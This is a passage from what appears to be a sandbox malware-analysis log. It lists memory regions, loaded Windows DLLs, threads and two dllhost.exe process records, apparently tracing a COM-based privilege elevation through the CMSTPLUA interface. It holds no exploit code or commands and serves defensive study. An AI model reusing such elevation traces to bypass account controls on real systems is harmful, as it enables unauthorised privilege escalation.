0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2146 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2147 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2148 start_va = 0x740000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2149 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2150 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2151 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2152 start_va = 0x7fef82d0000 end_va = 0x7fef830afff entry_point = 0x7fef82d0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 2153 start_va = 0x7fef8310000 end_va = 0x7fef834cfff entry_point = 0x7fef8310000 region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 2154 start_va = 0x7fef8350000 end_va = 0x7fef835afff entry_point = 0x7fef8350000 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 2155 start_va = 0x7fef8360000 end_va = 0x7fef8366fff entry_point = 0x7fef8360000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 2156 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2157 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2158 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2159 start_va = 0x7fefd5d0000 end_va = 0x7fefd5d7fff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 2160 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2161 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2162 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2163 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2164 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2165 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2166 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2167 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2168 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2169 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2170 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2171 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2172 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2173 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2174 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2179 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2180 start_va = 0x1b0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2181 start_va = 0x1b40000 end_va = 0x1c1efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b40000" filename = "" Region: id = 2182 start_va = 0x1d20000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 2183 start_va = 0x1f30000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 2184 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2185 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2186 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2187 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2188 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2189 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2190 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2191 start_va = 0x1c80000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 2192 start_va = 0x1fb0000 end_va = 0x227efff entry_point = 0x1fb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2193 start_va = 0x22c0000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 2194 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2195 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2196 start_va = 0x7feff6c0000 end_va = 0x7feff6d6fff entry_point = 0x7feff6c0000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 2197 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2198 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2199 start_va = 0x1de0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 2200 start_va = 0x2340000 end_va = 0x2732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 2201 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2202 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2203 start_va = 0x2740000 end_va = 0x2ac3fff entry_point = 0x2740000 region_type = mapped_file name = "nt5.cat" filename = "\\Windows\\System32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\nt5.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\nt5.cat") Region: id = 2204 start_va = 0x2ad0000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 2205 start_va = 0x2bd0000 end_va = 0x2dcffff entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 2206 start_va = 0x2e10000 end_va = 0x2e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2207 start_va = 0x7fef3110000 end_va = 0x7fef3135fff entry_point = 0x7fef3110000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 2208 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2209 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2210 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2211 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2212 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "cmstplua.dll.mui" filename = "\\Windows\\System32\\en-US\\cmstplua.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cmstplua.dll.mui") Region: id = 2213 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Thread: id = 122 os_tid = 0x854 Thread: id = 124 os_tid = 0x860 Thread: id = 125 os_tid = 0x864 Thread: id = 126 os_tid = 0x95c Thread: id = 129 os_tid = 0x968 Thread: id = 130 os_tid = 0x334 Process: id = "15" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1db2000" os_pid = "0x524" os_integrity_level = "0x4000" os_privileges = "0x60b60080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xe], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000739b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2215 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 2218 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2219 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2220 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2221 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2222 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2223 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2224 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 2225 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2226 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2227 start_va = 0x750000 end_va = 0x80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2228 start_va = 0x8d0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2229 start_va = 0xab0000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2230 start_va = 0xbb0000 end_va = 0xe7efff entry_point = 0xbb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2231 start_va = 0xec0000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 2232 start_va = 0xfc0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 2233 start_va = 0x10d0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2234 start_va = 0x1140000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 2235 start_va = 0x12f0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 2236 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2237 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2238 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2239 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2240 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2241 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2242 start_va = 0xff4a0000 end_va = 0xff4a6fff entry_point = 0xff4a0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 2243 start_va = 0x7fee3010000 end_va = 0x7fee30affff entry_point = 0x7fee3010000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2244 start_va = 0x7fefc660000 end_va = 0x7fefc683fff entry_point = 0x7fefc660000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2245 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2246 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2247 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2248 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2249 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2250 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2251 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2252 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2253 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2254 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2255 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2256 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2257 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2258 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2259 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2260 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2261 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2262 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2263 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2264 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2265 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2266 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2267 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2268 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2269 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2270 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2271 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2272 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2273 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2274 start_va = 0x7fef3150000 end_va = 0x7fef3161fff entry_point = 0x7fef3150000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 131 os_tid = 0x7dc Thread: id = 132 os_tid = 0xf0 Thread: id = 133 os_tid = 0x330 Thread: id = 134 os_tid = 0x674 Thread: id = 135 os_tid = 0x278 Thread: id = 136 os_tid = 0x5ec Thread: id = 137 os_tid = 0x554 Process: id = "16" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x20b2000" os_pid = "0x368" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x698" cmd_line = "C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2284 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2285 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2286 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2287 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2288 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2289 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2290 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2291 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2292 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2293 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2294 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2295 start_va = 0x330000 end_va = 